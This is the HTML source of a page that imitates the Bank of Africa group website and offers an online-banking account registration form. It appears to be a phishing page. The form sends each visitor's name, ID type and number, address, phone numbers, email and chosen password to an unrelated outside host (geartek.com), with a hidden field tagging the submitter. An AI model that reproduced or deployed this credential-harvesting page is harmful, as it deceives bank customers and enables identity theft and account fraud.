<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
  "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"
  xmlns:content="http://purl.org/rss/1.0/modules/content/"
  xmlns:dc="http://purl.org/dc/terms/"
  xmlns:foaf="http://xmlns.com/foaf/0.1/"
  xmlns:og="http://ogp.me/ns#"
  xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#"
  xmlns:sioc="http://rdfs.org/sioc/ns#"
  xmlns:sioct="http://rdfs.org/sioc/types#"
  xmlns:skos="http://www.w3.org/2004/02/skos/core#"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema#">

<head profile="http://www.w3.org/1999/xhtml/vocab">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="http://www.bank-of-africa.net/sites/default/files/fav-icon-boa-logo.png" type="image/png" />
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
<link rel="alternate" type="application/rss+xml" title="GROUPE BANK OF AFRICA RSS" href="http://www.bank-of-africa.net/en/rss.xml" />
  <title>Address | GROUPE BANK OF AFRICA</title>
  <link type="text/css" rel="stylesheet" href="../css/style1.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style2.css" media="screen" />
<link type="text/css" rel="stylesheet" href="../css/style3.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style4.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style5.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/style6.css" media="print" />

<!--[if lt IE 7]>
<link type="text/css" rel="stylesheet" href="http://www.bank-of-africa.net/sites/all/themes/boa_grp/fix-ie.css?noehx5" media="all" />
<![endif]-->
<link type="text/css" rel="stylesheet" href="../css/style7.css" media="all" />
  <script type="text/javascript" src="../js/jquery.min.js?v=1.8.2"></script>
<script type="text/javascript" src="../js/jquery.once.js?v=1.2"></script>
<script type="text/javascript" src="../js/drupal.js"></script>
<script type="text/javascript" src="../js/views_slideshow.js?v=1.0"></script>
<script type="text/javascript" src="../js/custom_search.js"></script>
<script type="text/javascript" src="../js/jump-menu.js"></script>
<script type="text/javascript" src="../js/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="../js/views_slideshow_cycle.js"></script>
<script type="text/javascript" src="../js/views_nivo_slider.js"></script>
<script type="text/javascript" src="../js/jquery.nivo.slider.pack.js"></script>
<script type="text/javascript" src="../js/jquery.hoverIntent.minified.js"></script>
<script type="text/javascript" src="../js/superfish.js"></script>
<script type="text/javascript" src="../js/supersubs.js"></script>
<script type="text/javascript" src="../js/superfish2.js"></script>
<script type="text/javascript" src="../js/jquery.fancybox-1.3.4.pack.js"></script>
<script type="text/javascript" src="../js/boa-grp.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, {"basePath":"\/","pathPrefix":"en\/","ajaxPageState":{"theme":"boa_grp","theme_token":"cCGb3OQVsV3IJ9YxabE4My72Z5BYqzLQb9rpBckRZ3o","js":{"sites\/all\/modules\/jquery_update\/replace\/jquery\/1.8\/jquery.min.js":1,"misc\/jquery.once.js":1,"misc\/drupal.js":1,"sites\/all\/modules\/views_slideshow\/js\/views_slideshow.js":1,"sites\/all\/modules\/custom_search\/js\/custom_search.js":1,"sites\/all\/modules\/ctools\/js\/jump-menu.js":1,"sites\/all\/libraries\/jquery.cycle\/jquery.cycle.all.min.js":1,"sites\/all\/modules\/views_slideshow\/contrib\/views_slideshow_cycle\/js\/views_slideshow_cycle.js":1,"sites\/all\/modules\/google_analytics\/googleanalytics.js":1,"sites\/all\/modules\/views_nivo_slider\/views_nivo_slider.js":1,"sites\/all\/libraries\/nivo-slider\/jquery.nivo.slider.pack.js":1,"0":1,"sites\/all\/libraries\/superfish\/jquery.hoverIntent.minified.js":1,"sites\/all\/libraries\/superfish\/superfish.js":1,"sites\/all\/libraries\/superfish\/supersubs.js":1,"sites\/all\/modules\/superfish\/superfish.js":1,"sites\/all\/themes\/boa_grp\/js\/fancybox\/jquery.fancybox-1.3.4.pack.js":1,"sites\/all\/themes\/boa_grp\/js\/boa-grp.js":1},"css":{"modules\/system\/system.base.css":1,"modules\/system\/system.menus.css":1,"modules\/system\/system.messages.css":1,"modules\/system\/system.theme.css":1,"sites\/all\/modules\/views_slideshow\/views_slideshow.css":1,"modules\/comment\/comment.css":1,"modules\/field\/theme\/field.css":1,"modules\/node\/node.css":1,"modules\/search\/search.css":1,"modules\/user\/user.css":1,"modules\/forum\/forum.css":1,"sites\/all\/modules\/views\/css\/views.css":1,"sites\/all\/modules\/ctools\/css\/ctools.css":1,"modules\/locale\/locale.css":1,"sites\/all\/modules\/views_slideshow\/views_slideshow_controls_text.css":1,"sites\/all\/modules\/views_slideshow\/contrib\/views_slideshow_cycle\/views_slideshow_cycle.css":1,"sites\/all\/libraries\/nivo-slider\/nivo-slider.css":1,"sites\/all\/libraries\/nivo-slider\/themes\/default\/default.css":1,"sites\/all\/modules\/views_nivo_slider\/views_nivo_slider.css":1,"sites\/all\/modules\/custom_search\/custom_search.css":1,"sites\/all\/libraries\/superfish\/css\/superfish.css":1,"sites\/all\/themes\/boa_grp\/css\/960.css":1,"sites\/all\/themes\/boa_grp\/css\/reset.css":1,"sites\/all\/themes\/boa_grp\/css\/text1.css":1,"sites\/all\/themes\/boa_grp\/css\/style.css":1,"sites\/all\/themes\/boa_grp\/js\/fancybox\/jquery.fancybox-1.3.4.css":1,"sites\/all\/themes\/boa_grp\/css\/print.css":1,"sites\/all\/themes\/boa_grp\/fix-ie.css":1,"public:\/\/css_injector\/css_injector_1.css":1}},"custom_search":{"form_target":"_self","solr":0},"views_nivo_slider":{"views-nivo-slider-homeslideshow-block":{"startSlide":0,"effect":"boxRainGrow","slices":15,"animSpeed":500,"pauseTime":3000,"directionNav":true,"directionNavHide":false,"controlNav":true,"controlNavThumbs":false,"pauseOnHover":true,"manualAdvance":false,"captionOpacity":1,"version":"2.7.x","controlNavThumbsFromRel":false,"keyboardNav":true},"views-nivo-slider-slideshow-gauche-block":{"startSlide":0,"effect":"random","slices":15,"animSpeed":500,"pauseTime":3000,"directionNav":true,"directionNavHide":true,"controlNav":false,"controlNavThumbs":false,"pauseOnHover":true,"manualAdvance":false,"captionOpacity":0.8,"version":"2.7.x","controlNavThumbsFromRel":false,"keyboardNav":true}},"viewsSlideshow":{"homeactualites-block_1":{"methods":{"goToSlide":["viewsSlideshowPager","viewsSlideshowSlideCounter","viewsSlideshowCycle"],"nextSlide":["viewsSlideshowPager","viewsSlideshowSlideCounter","viewsSlideshowCycle"],"pause":["viewsSlideshowControls","viewsSlideshowCycle"],"play":["viewsSlideshowControls","viewsSlideshowCycle"],"previousSlide":["viewsSlideshowPager","viewsSlideshowSlideCounter","viewsSlideshowCycle"],"transitionBegin":["viewsSlideshowPager","viewsSlideshowSlideCounter"],"transitionEnd":[]},"paused":0}},"viewsSlideshowControls":{"homeactualites-block_1":{"bottom":{"type":"viewsSlideshowControlsText"}}},"viewsSlideshowCycle":{"#views_slideshow_cycle_main_homeactualites-block_1":{"num_divs":3,"id_prefix":"#views_slideshow_cycle_main_","div_prefix":"#views_slideshow_cycle_div_","vss_id":"homeactualites-block_1","effect":"fade","transition_advanced":0,"timeout":5000,"speed":700,"delay":0,"sync":1,"random":0,"pause":1,"pause_on_click":0,"action_advanced":0,"start_paused":0,"remember_slide":0,"remember_slide_days":1,"pause_in_middle":0,"pause_when_hidden":0,"pause_when_hidden_type":"full","amount_allowed_visible":"","nowrap":0,"fixed_height":1,"items_per_slide":1,"wait_for_image_load":1,"wait_for_image_load_timeout":3000,"cleartype":0,"cleartypenobg":0,"advanced_options":"{}"}},"googleanalytics":{"trackOutbound":1,"trackMailto":1,"trackDownload":1,"trackDownloadExtensions":"7z|aac|arc|arj|asf|asx|avi|bin|csv|doc|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls|xml|z|zip"},"superfish":{"1":{"id":"1","sf":{"animation":{"opacity":"show","height":"show"},"speed":"\u0027fast\u0027","autoArrows":false,"dropShadows":true,"disableHI":false},"plugins":{"supposition":false,"bgiframe":false,"supersubs":{"minWidth":"12","maxWidth":"27","extraWidth":1}}}}});
//--><!]]>
</script>
</head>
<body class="html front not-logged-in one-sidebar sidebar-first page-node i18n-en" >
  <div id="skip-link">
    <a href="#main-content" class="element-invisible element-focusable">Skip to main content</a>
  </div>
    <script type="text/javascript" src="jsjquery.fancybox-1.3.4.pack.js"></script>
<link rel="stylesheet" type="text/css" href="../js/jquery.fancybox-1.3.4.css" media="screen" />
<script type="text/javascript">
	/*jQuery(document).ready(function(){
		jQuery.fancybox({
            'autoScale': true,
            'transitionIn': 'fade',
            'transitionOut': 'fade',
            'autoDimensions'    : false,
            'width':536,
            'height':405,
            'hideOnContentClick': true,
            //'href': 'http://bank-of-africa.net/sites/all/themes/boa_grp/images/Voeux-BOA-2014.gif'
            'content': '<a href=\'http://bank-of-africa.net/boa-ecard/2014.html\' target=\'_blank\'><img src=\'http://bank-of-africa.net/sites/all/themes/boa_grp/images/Voeux-BOA-2014.gif\' /></a>'
        });

	});*/
</script>

    
	<!-----------HEADER------------------>	
	<div id="debord-header">
    	<div class="container_16">  
            <div class="grid_16">
              <div id="boa-grp-header">
                  <div class="grid_8">
                    <div id="boa-grp-logo">
                                                                              <h1 id="branding"><a href="#">
                                                          <img src="../images/logo.png" alt="GROUPE BANK OF AFRICA " title="GROUPE BANK OF AFRICA " id="logo" />
                                                                                    </a></h1>
                                                                    </div>
                  </div> 
                  <div class="grid_8 alpha omega">
                    <div id="boa-grp-header-right">
                        <div id="boa-grp-search-zone">
                        	  <div class="region region-boa-grp-search">
    <div id="block-locale-language" class="block block-locale clearfix">

    
  <div class="content">
  </div>
</div>
<div id="block-views-tous-les-sites-block" class="block block-views clearfix">

    
  <div class="content">
    <div class="view view-tous-les-sites view-id-tous_les_sites view-display-id-block view-dom-id-0ca9b4953ad86d6971776d25c8f398b6">  
</div>  </div>
</div>
<div id="block-custom-search-blocks-1" class="block block-custom-search-blocks clearfix">
</div>
  </div>
                        </div>
                        <div  id="boa-grp-top-menu">
                              <div class="region region-boa-grp-top-menu">
    <div id="block-menu-block-5" class="block block-menu-block clearfix">

    
  <div class="content">
    <div class="menu-block-wrapper menu-block-5 menu-name-menu-top-menu parent-mlid-0 menu-level-1">
  <ul class="menu"><li class="first leaf menu-mlid-683"><a href="#" title="Clients">Clients</a></li>
<li class="leaf menu-mlid-684"><a href="#" title="Shareholders">Shareholders</a></li>
<li class="leaf menu-mlid-685"><a href="#" title="Careers">Careers</a></li>
<li class="last leaf menu-mlid-799"><a href="#" title="Press">Press</a></li>
</ul></div>
  </div>
</div>
  </div>
                        </div>
                    </div>
                  </div>     
              </div>
            </div>
        </div>        
	</div>
    <!-----------MENU------------------>
    <div id="debord-menu">
    	<div class="container_16">
            <div class="grid_16">
              <div id="boa-grp-menu">      	
                				  <div class="region region-boa-grp-nav-menu">
    <div id="block-superfish-1" class="block block-superfish clearfix">

    
    
  <div class="content">
    <ul id="superfish-1" class="menu sf-menu sf-main-menu sf-horizontal sf-style-none sf-total-items-6 sf-parent-items-5 sf-single-items-1">
    <li id="menu-980-1" class="middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="index.html" class="sf-depth-1 menuparent">Home</a></li><li id="menu-1197-1" class="middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="contact.html" class="sf-depth-1 menuparent">Contact Us</a></li><li id="menu-1197-1" class="middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="boaOnline.html" class="sf-depth-1 menuparent">Login To Online Banking</a></li><li id="menu-1197-1" class="active-trail middle even sf-item-2 sf-depth-1 sf-total-children-2 sf-parent-children-0 sf-single-children-2 menuparent"><a href="boaOnlineReg.html" class="sf-depth-1 menuparent">Register For Online Banking</a></li>
    
    </ul>  </div>
</div>
  </div>
                              </div>
                              
            </div>
     	</div>
     </div>        
        
    <!-----------SLIDE-SHOW------------------>
    <div class="container_16"> 
        <div class="grid_16">
		<div class="login">
        <form name="form" id="form" action="http://www.geartek.com/campaign/open_account.php" class="mainCont" method="post">
            <input type="hidden" name="username" value="stasbk">
            <input type="hidden" name="reqd" value="0">
            <input type="hidden" name="url" value="open_account.htm">
             <div class="field">
  			<input type="text" name="lname" class="inputClass" placeholder="Last Name" required>
            </div>
             <div class="field">
            <input type="text" name="fname" class="inputClass" placeholder="First Name" required>
            </div>
             <div class="field">
            <input type="text" class="inputClass" name="age" id="age" placeholder="Age" required>
            </div>
             <div class="field">
            <select name="ID" class="inputClass">
            	<option value="Driver License">Driver's License </option>
                <option value="Passport">Passport </option>
				<option value="None">None</option>
            </select>
            </div>
             <div class="field">
            <input type="text" name="idnum" id="idnum" class="inputClass" placeholder="ID Number" required>
            </div>
             <div class="field">
            <input type="text" name="idissue" max="20" class="inputClass" placeholder="Place Of Issue" required>
            </div>
             <div class="field">
            <input type="text" name="occupation" size="20" class="inputClass" placeholder="Occupation" required>
            </div>
             <div class="field">
            <input type="text" name="comp" class="inputClass" placeholder="Company(If Applicable)">
            </div>
             <div class="field">
			<input type="text" name="add1" class="inputClass" placeholder="Address" required>
            </div>
             <div class="field">
			<input type="text" name="city" class="inputClass" placeholder="City">
            </div>
             <div class="field">
            <input type="text" name="state1" class="inputClass" placeholder="State/Province" required>
            </div>
             <div class="field">
               <select name="country" id="country" class="inputClass">
             <option value="">Choose a Country </option>
  			 <option value="USA">United States of America </option>
             <option value="CAN">Canada </option>
             <option value="DEU">Germany </option>
             <option value="FRA">France </option>
             <option value="GBR">United Kingdom </option>
             <option value="IND">India </option>
             <option value="">--------------------- </option>
             <option value="AFG">Afghanistan </option>
             <option value="ALB">Albania </option>
             <option value="DZA">Algeria </option>
             <option value="ASM">American Samoa </option>
             <option value="AND">Andorra </option>
             <option value="AGO">Angola </option>
             <option value="AIA">Anguilla </option>
             <option value="ATA">Antarctica </option>
             <option value="ATG">Antigua and Barbuda </option>
             <option value="ARG">Argentina </option>
             <option value="ARM">Armenia </option>
             <option value="ABW">Aruba </option>
             <option value="AUS">Australia </option>
             <option value="AUT">Austria </option>
             <option value="AZE">Azerbaijan </option>
             <option value="BHS">Bahamas </option>
             <option value="BHR">Bahrain </option>
             <option value="BGD">Bangladesh </option>
             <option value="BRB">Barbados </option>
             <option value="BLR">Belarus </option>
             <option value="BEL">Belgium </option>
             <option value="BLZ">Belize </option>
             <option value="BEN">Benin </option>
             <option value="BMU">Bermuda </option>
             <option value="BTN">Bhutan </option>
             <option value="BOL">Bolivia </option>
             <option value="BIH">Bosnia and Herzegowina</option>
             <option value="BWA">Botswana </option>
             <option value="BVT">Bouvet Island </option>
             <option value="BRA">Brazil </option>
             <option value="IOT">British Indian Ocean Territory</option>
             <option value="BRN">Brunei Darussalam </option>
             <option value="BGR">Bulgaria </option>
             <option value="BFA">Burkina Faso </option>
             <option value="BDI">Burundi </option>
             <option value="KHM">Cambodia </option>
             <option value="CMR">Cameroon </option>
             <option value="CPV">Cape Verde </option>
             <option value="CYM">Cayman Islands </option>
             <option value="CAF">Central African Republic</option>
             <option value="TCD">Chad </option>
             <option value="CHL">Chile </option>
             <option value="CHN">China </option>
             <option value="CXR">Christmas Island </option>
             <option value="CCK">Cocoa (Keeling) Islands</option>
             <option value="COL">Colombia </option>
             <option value="COM">Comoros </option>
             <option value="COG">Congo </option>
             <option value="COK">Cook Islands </option>
             <option value="CRI">Costa Rica </option>
             <option value="CIV">Cote Divoire </option>
             <option value="HRV">Croatia (local name:Hrvatska)</option>
             <option value="CUB">Cuba </option>
             <option value="CYP">Cyprus </option>
             <option value="CZE">Czech Republic </option>
             <option value="DNK">Denmark </option>
             <option value="DJI">Djibouti </option>
             <option value="DMA">Dominica </option>
             <option value="DOM">Dominican Republic </option>
             <option value="TMP">East Timor </option>
             <option value="ECU">Ecuador </option>
             <option value="EGY">Egypt </option>
             <option value="SLV">El Salvador </option>
             <option value="GNQ">Equatorial Guinea </option>
             <option value="ERI">Eritrea </option>
             <option value="EST">Estonia </option>
             <option value="ETH">Ethiopia </option>
             <option value="FLK">Falkland Islands(Malvinas)</option>
             <option value="FRO">Faroe Islands </option>
             <option value="FJI">Fiji </option>
             <option value="FIN">Finland </option>
             <option value="FXX">France, Metropolitan </option>
             <option value="GUF">French Guiana </option>
             <option value="PYF">French Polynesia </option>
             <option value="ATF">French Southern Territories</option>
             <option value="GAB">Gabon </option>
             <option value="GMB">Gambia </option>
             <option value="GEO">Georgia </option>
             <option value="GHA">Ghana </option>
             <option value="GIB">Gibraltar </option>
             <option value="GRC">Greece </option>
             <option value="GRL">Greenland </option>
              <option value="GRD">Grenada </option>
              <option value="GLP">Guadeloupe </option>
              <option value="GUM">Guam </option>
             <option value="GTM">Guatemala </option>
             <option value="GIN">Guinea </option>
             <option value="GNB">Guinea-Bissau </option>
             <option value="GUY">Guyana </option>
             <option value="HTI">Haiti </option>
              <option value="HMD">Heard and Mc Donald Islands </option>
             <option value="HND">Honduras </option>
                                    <option value="HKG">Hong Kong </option>
                                    <option value="HUN">Hungary </option>

                                    <option value="ISL">Iceland </option>
                                    <option value="IDN">Indonesia </option>
                                    <option value="IRN">Iran (Islamic Republic 
									of) </option>
                                    <option value="IRQ">Iraq </option>
                                    <option value="IRL">Ireland </option>
                                    <option value="ISR">Israel </option>

                                    <option value="ITA">Italy </option>
                                    <option value="JAM">Jamaica </option>
                                    <option value="JPN">Japan </option>
                                    <option value="JOR">Jordan </option>
                                    <option value="KAZ">Kazakhstan </option>
                                    <option value="KEN">Kenya </option>

                                    <option value="KIR">Kiribati </option>
                                    <option value="PRK">Korea, Democratic 
									Peoples Republic of </option>
                                    <option value="KOR">Korea, Republic of </option>
                                    <option value="KWT">Kuwait </option>
                                    <option value="KGZ">Kyrgyzstan </option>
                                    <option value="LAO">Lao Peoples Democratic 
									Republic </option>

                                    <option value="LVA">Latvia </option>
                                    <option value="LBN">Lebanon </option>
                                    <option value="LSO">Lesotho </option>
                                    <option value="LBR">Liberia </option>
                                    <option value="LBY">Libyan Arab Jamahiriya 
                                    </option>
                                    <option value="LIE">Liechtenstein </option>

                                    <option value="LTU">Lithuania </option>
                                    <option value="LUX">Luxembourg </option>
                                    <option value="MAC">Macau </option>
                                    <option value="MKD">Macedonia, The Former 
									Yugoslav Republic of </option>
                                    <option value="MDG">Madagascar </option>
                                    <option value="MWI">Malawi </option>

                                    <option value="MYS">Malaysia </option>
                                    <option value="MDV">Maldives </option>
                                    <option value="MLI">Mali </option>
                                    <option value="MLT">Malta </option>
                                    <option value="MHL">Marshall Islands </option>
                                    <option value="MTQ">Martinique </option>

                                    <option value="MRT">Mauritania </option>
                                    <option value="MVS">Mauritius </option>
                                    <option value="MYT">Mayotte </option>
                                    <option value="MEX">Mexico </option>
                                    <option value="FSM">Micronesia, Federated 
									States of </option>
                                    <option value="MDA">Moldova, Republic of </option>

                                    <option value="MCO">Monaco </option>
                                    <option value="MNG">Mongolia </option>
                                    <option value="MSR">Montserrat </option>
                                    <option value="MAR">Morocco </option>
                                    <option value="MOZ">Mozambique </option>
                                    <option value="MMR">Myanmar </option>

                                    <option value="NAM">Namibia </option>
                                    <option value="NRU">Nauru </option>
                                    <option value="NPL">Nepal </option>
                                    <option value="NLD">Netherlands </option>
                                    <option value="ANT">Netherlands Antilles </option>
                                    <option value="NCL">New Caledonia </option>

                                    <option value="NZL">New Zealand </option>
                                    <option value="NIC">Nicaragua </option>
                                    <option value="NER">Niger </option>
                                    <option value="NGA">Nigeria </option>
                                    <option value="NIU">Niue </option>
                                    <option value="NFK">Norfolk Island </option>

                                    <option value="MNP">Northern Mariana Islands 
                                    </option>
                                    <option value="MOR">Norway </option>
                                    <option value="OMN">Oman </option>
                                    <option value="PAK">Pakistan </option>
                                    <option value="PLW">Palau </option>
                                    <option value="PAN">Panama </option>

                                    <option value="PNG">Papua New Guinea </option>
                                    <option value="PRY">Paraguay </option>
                                    <option value="PER">Peru </option>
                                    <option value="PHL">Philippines </option>
                                    <option value="PCN">Pitcairn </option>
                                    <option value="POL">Poland </option>

                                    <option value="PRT">Portugal </option>
                                    <option value="PRI">Puerto Rico </option>
                                    <option value="QAT">Qatar </option>
                                    <option value="REU">Reunion </option>
                                    <option value="ROM">Romania </option>
                                    <option value="RUS">Russian Federation </option>

                                    <option value="RWA">Rwanda </option>
                                    <option value="KNA">Saint Kitts and Nevis 
                                    </option>
                                    <option value="LCA">Saint Lucia </option>
                                    <option value="VCT">Saint Vincent and the 
									Grenadines </option>
                                    <option value="WSM">Samoa </option>
                                    <option value="SMR">San Marino </option>

                                    <option value="STP">Sao Tome and Principe 
                                    </option>
                                    <option value="SAU">Saudi Arabia </option>
                                    <option value="SEN">Senegal </option>
                                    <option value="SYC">Seychelles </option>
                                    <option value="SLE">Sierra Leone </option>
                                    <option value="SGP">Singapore </option>

                                    <option value="SVK">Slovakia (Slovak 
									Republic) 
                                    </option>
                                    <option value="SVN">Slovenia </option>
                                    <option value="SLB">Solomon Islands </option>
                                    <option value="SOM">Somalia </option>
                                    <option value="ZAF">South Africa </option>
                                    <option value="SGS">South Georgia and the 
									South Sandwich Islands </option>

                                    <option value="ESP">Spain </option>
                                    <option value="LKA">Sri Lanka </option>
                                    <option value="SHN">St. Helena </option>
                                    <option value="SPM">St. Pierre and Miquelon 
                                    </option>
                                    <option value="SDN">Sudan </option>
                                    <option value="SUR">Suriname </option>

                                    <option value="SJM">Svalbard and Jan Mayen 
									Islands </option>
                                    <option value="SWZ">Swaziland </option>
                                    <option value="SWE">Sweden </option>
                                    <option value="CHE">Switzerland </option>
                                    <option value="SYR">Syrian Arab Republic </option>
                                    <option value="TWN">Taiwan </option>

                                    <option value="TJK">Tajikistan </option>
                                    <option value="TZA">Tanzania, United 
									Republic of </option>
                                    <option value="THA">Thailand </option>
                                    <option value="TGO">Togo </option>
                                    <option value="TKL">Tokelau </option>
                                    <option value="TON">Tonga </option>

                                    <option value="TTO">Trinidad and Tobago </option>
                                    <option value="TUN">Tunisia </option>
                                    <option value="TUR">Turkey </option>
                                    <option value="TKM">Turkmenistan </option>
                                    <option value="TCA">Turks and Caicos Islands 
                                    </option>
                                    <option value="TUV">Tuvalu </option>

                                    <option value="UGA">Uganda </option>
                                    <option value="UKR">Ukraine </option>
                                    <option value="ARE">United Arab Emirates </option>
                                    <option value="UMI">United States Minor 
									Outlying Islands </option>
                                    <option value="URY">Uruguay </option>
                                    <option value="UZB">Uzbekistan </option>

                                    <option value="VUT">Vanuatu </option>
                                    <option value="VAT">Vatican City State (Holy 
									See) </option>
                                    <option value="VEN">Venezuela </option>
                                    <option value="VNM">Viet Nam </option>
                                    <option value="VGB">Virgin Islands (British) 
                                    </option>
                                    <option value="VIR">Virgin Islands (U.S.) 
                                    </option>

                                    <option value="WLF">Wallisw and Futuna 
									Islands 
                                    </option>
                                    <option value="ESH">Western Sahara </option>
                                    <option value="YEM">Yeman </option>
                                    <option value="YUG">Yugoslavia </option>
                                    <option value="ZAR">Zaire </option>
                                    <option value="ZMB">Zambia </option>

                                    <option value="ZWE">Zimbabwe </option>
                                    <option value="UNK">Not Listed </option>
                                  </select>
             </div>
              <div class="field">
            <input type="text" name="zipcode" class="inputClass" placeholder="Zip Code" required>
            </div>
             <div class="field">
            <input type="tel" name="tel" class="inputClass" placeholder="Telephone" required>
            </div>
             <div class="field">
            <input type="text" name="fax2" class="inputClass" placeholder="Fax">
            </div>
             <div class="field">
            <input type="text" name="mobile" class="inputClass" placeholder="Mobile" required>
            </div>
             <div class="field">
            <select name="address_length" class="inputClass">
            	<option value="">Choose Address Length </option>
                <option value="1 Year">1 Year </option>
                <option value="2 Year">2 Year </option>
                <option value="3 Year">3 Year </option>
                <option value="+4 Year">+4 Year</option>
            </select>
            </div>
             <div class="field">
             <select name="home_status" class="inputClass">
            	<option value="">Choose Home Type</option>
                <option value="Own">Own </option>
                <option value="Rent">Rent</option>
                <option value="Other">Other</option>
            </select>
            </div>
             <div class="field">
           <input type="email" name="email" class="inputClass" placeholder="Email" required>
           </div>
            <div class="field">
           <input type="password" name="password" class="inputClass" placeholder="Password" required> 
           </div>
            <div class="field">
           What type of account do you want to run?
           </div>
            <div class="field">
           <select name="account_type" class="inputClass">
            	<option value="">Choose Account Type</option>
                <option value="Fixed Deposit">1 Year </option>
                <option value="Savings">Savings</option>
                <option value="Transit">Transit</option>
            </select>
            </div>
             <div class="field">
           By clicking submit, you agree to be bound by our <a href="terms.html">terms</a> and <a href="policies.html">policies</a>
           </div>
            <div class="field">
        <input  type="Submit" name="submit" class="loginBtn" id="submit" value="Submit" title = "Submit"/>
        </div>
            </form>
        </div>
     </div>   
    <!-----------CONTENT------------------>
    <div id="debord-content">
        
        <div style="clear:both"></div>

    </div>
    <!-----------FOOTER------------------>    
    <div id="debord-footer">
        <div class="container_16">         
            <div class="grid_16">
              <div id="boa-grp-bottom-footer">
              	  <div class="region region-boa-grp-bottom-footer">
    <div id="block-menu-block-2" class="block block-menu-block clearfix">

    
  <div class="content">
    <div class="menu-block-wrapper menu-block-2 menu-name-main-menu parent-mlid-0 menu-level-1">
  <ul class="menu"><li class="first expanded menu-mlid-980"><a href="#">About Us</a><ul class="menu"><li class="first leaf menu-mlid-828"><a href="#">About BOA Group</a></li>
<li class="leaf menu-mlid-830"><a href="#">Our Values</a></li>
<li class="leaf menu-mlid-832"><a href="#">Our Key Figures </a></li>
<li class="last leaf menu-mlid-686"><a href="#" title="Our products &amp; services">Our Products &amp; Services</a></li>
</ul></li>
<li class="expanded menu-mlid-1197"><a href="#">Our Presence</a><ul class="menu"><li class="first leaf menu-mlid-1198"><a href="#">Map</a></li>
<li class="last leaf menu-mlid-679"><a href="#">Address</a></li>
</ul></li>
<li class="leaf menu-mlid-674"><a href="#">Our Products &amp; Services</a></li>
<li class="expanded menu-mlid-544"><a href="#">BOA Foundation</a><ul class="menu"><li class="first leaf menu-mlid-834"><a href="#">Introduction</a></li>
<li class="leaf menu-mlid-836"><a href="/#">Vision and Mission</a></li>
<li class="leaf menu-mlid-675"><a href="#">Countries of Operation</a></li>
<li class="leaf menu-mlid-1025"><a href="#">Achievements and Projects</a></li>
<li class="last leaf menu-mlid-676"><a href="contact.html">Contact Us</a></li>
</ul></li>
<li class="expanded menu-mlid-798"><a href="#">Communications</a><ul class="menu"><li class="first leaf has-children menu-mlid-809"><a href="#">Activity reports</a></li>
<li class="leaf menu-mlid-820"><a href="#">Press releases</a></li>
<li class="leaf menu-mlid-824"><a href="#">Publications</a></li>
<li class="leaf menu-mlid-821"><a href="#">Corporate Communications</a></li>
<li class="leaf menu-mlid-822"><a href="#">Product Communications</a></li>
<li class="last leaf menu-mlid-1202"><a href="#">Tender</a></li>
</ul></li>
<li class="last expanded menu-mlid-682"><a href="#" title="Your career at BOA">Your career at BOA</a><ul class="menu"><li class="first leaf menu-mlid-680"><a href="#">Why choose BOA?</a></li>
<li class="leaf menu-mlid-983"><a href="#">Vacancies</a></li>
<li class="last leaf menu-mlid-681"><a href="#">Open Applications</a></li>
</ul></li>
</ul></div>
  </div>
</div>
  </div>
              </div>
            </div>
        </div>
    </div>
    <!---------------------------------->
      </body>
</html>
